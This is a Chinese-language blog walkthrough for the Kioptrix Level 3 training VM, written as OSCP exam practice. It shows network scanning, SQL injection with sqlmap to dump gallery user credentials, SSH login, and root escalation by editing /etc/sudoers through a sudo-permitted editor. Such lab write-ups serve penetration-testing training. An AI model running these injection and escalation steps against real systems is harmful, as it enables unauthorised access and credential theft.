OSCP备战-kioptrixvm3详细解法

small_white_robot2025-05-12 14:32

探测IP

复制代码 
arp-scan -l

得出目标IP:192.168.155.165

也可以使用

复制代码 
netdiscover -i eth0 -r 192.168.155.0/24

也可以使用

复制代码 
nmap -sN 192.168.155.0/24 --min-rate 1000

修改hosts文件

找到IP后,通过之前读取README.txt了解到,我们需要编辑hosts文件,将其指向kioptrix3.com

输入命令:

复制代码 
sudo nano /etc/hosts

添加一行如图所示:

复制代码 
192.168.155.165 kioptrix3.com

按下ctrl+x保存退出

端口扫描

复制代码 
nmap -sV -sT --min-rate 1000 -p1-65535 IP

结果:

Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-08 08:49 EDT

Nmap scan report for 192.168.155.165

Host is up (0.0050s latency).

Not shown: 65533 closed tcp ports (conn-refused)

PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)

80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with

80端口

访问一下

拿dirsearch 扫一下看看

复制代码 
dirsearch -u http://192.168.155.165 -e *

访问一下试试:

192.168.155.165/phpmyadmin/index.php

尝试无密码登录:admin

进入后台

no privileges提示我们没有权限,显示即为一个虚拟数据库

尝试爆破了一下,没出结果

回到主页,能点的都点一下

博客给了一个网页http://kioptrix3.com/gallery,和主页点击now跳转网页是一样的

点击login又是一个登录框

最开始我们就改了hosts文件,访问一下http://kioptrix3.com站点

如图:

明显跟之前的页面不一样,在那dirsearch扫一下

复制代码 
dirsearch -u http://kioptrix3.com/gallery -e *

访问得到:

Gallarific 2.1 - Free Version released October 10, 2009

搜一下searchsploit Gallarific

有一个注入漏洞的

复制代码 
sqlmap -u  http://kioptrix3.com/gallery/gallery.php?id=1 -p id --batch

数据库:

复制代码 
sqlmap -u  http://kioptrix3.com/gallery/gallery.php?id=1 -p id --batch --dbs

现在连接的数据库:

复制代码 
sqlmap -u  http://kioptrix3.com/gallery/gallery.php?id=1 -p id --batch --current-db

DBMS用户:

复制代码 
sqlmap -u  http://kioptrix3.com/gallery/gallery.php?id=1 -p id --batch --current-user

发现是root用户

表:

复制代码 
sqlmap -u  http://kioptrix3.com/gallery/gallery.php?id=1 -p id --batch -D gallery --tables

字段:

复制代码 
sqlmap -u  http://kioptrix3.com/gallery/gallery.php?id=1 -p id --batch -D gallery -T gallarific_users --columns

值:

复制代码 
sqlmap -u  http://kioptrix3.com/gallery/gallery.php?id=1 -p id --batch -D gallery -T gallarific_users -C "username,password" --dump

得到登录结果:
admin/n0t7t1k4

如此尝试,发现在dev_accounts中,得到了两组用户名和密码

尝试进行连接,只有后两组密码可以连接

复制代码 
ssh -oHostKeyAlgorithms=+ssh-rs- loneferret@192.168.155.165

查看查看:

复制代码 
cat /etc/passwd

列出当前用户家目录下的所有文件和文件夹:

复制代码 
ls -al

读取文件:

复制代码 
cat CompanyPolicy.README

查看权限:

复制代码 
sudo -l

根据提示执行:

复制代码 
sudo /usr/local/bin/ht

报错

执行命令:

复制代码 
echo $TERM
export TERM=xterm
echo $TERM

重新执行

复制代码 
sudo /usr/local/bin/ht


按住F3,输入/etc/sudoers

回车.当用户执行sudo命令时,系统会到/etc/sudoers文件中寻找相关信息来判断该用户是否具有执行sudo的权限,所以我们修改sudoers文件,试用户loneferret具有使用sudo执行/bin/bash的权限,以达到提权的目的。

修改配置添加一行

复制代码 
loneferret ALL=(ALL) ALL

F2保存,ctral+c退出

执行命令

复制代码 
sudo /bin/bash

成功

相关推荐
网络安全-海哥17 小时前
Web安全深度实战:从漏洞原理到防护方案
sql·web安全·网络安全·xss·csrf·漏洞挖掘·安全防护
运维帮手大橙子17 小时前
最近面试题总结
linux·服务器·网络
Black蜡笔小新1 天前
视频汇聚平台EasyCVR级联播放偶发失败排查:TCP主动模式下的3秒超时响应差
网络·tcp/ip·音视频
Fms_Sa1 天前
UDP的一次双向通信
网络·网络协议·udp
zzz.101 天前
top命令的详解
linux·服务器·网络
馨谙1 天前
网络故障排查三板斧:路由追踪、端口检查,快速定位网络问题
linux·网络
keer_zu1 天前
一个Modbus-TCP传感器数据传输方案
网络·网络协议·tcp/ip
newxtc1 天前
【浙江政务服务网-注册_登录安全分析报告】
运维·selenium·安全·政务
深度学习实战训练营1 天前
MemNet:一种用于图像恢复的持久性存储网络
网络·人工智能
TiAmo8081 天前
ip生产区
服务器·网络·tcp/ip
热门推荐
01BongoCat - 跨平台键盘猫动画工具02GitHub 镜像站点03UV安装并设置国内源04GitLab 零基础入门指南:从安装到项目管理全流程05Linux下V2Ray安装配置指南06NVIDIA显卡驱动、CUDA、cuDNN 和 TensorRT 版本匹配指南07Labelme从安装到标注:零基础完整指南082025软件测试面试八股文(含答案+文档)09jdk21下载、安装(Windows、Linux、macOS)10在VSCode配置Java开发环境的保姆级教程(适配各类AI编程IDE)